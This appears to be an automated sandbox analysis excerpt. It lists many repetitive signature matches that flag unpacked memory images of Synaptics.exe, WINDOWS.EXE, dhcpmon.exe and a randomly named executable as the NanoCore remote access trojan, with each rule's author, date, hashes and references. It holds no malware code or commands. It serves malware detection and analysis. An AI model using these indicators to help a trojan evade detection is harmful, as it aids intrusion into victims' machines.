            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
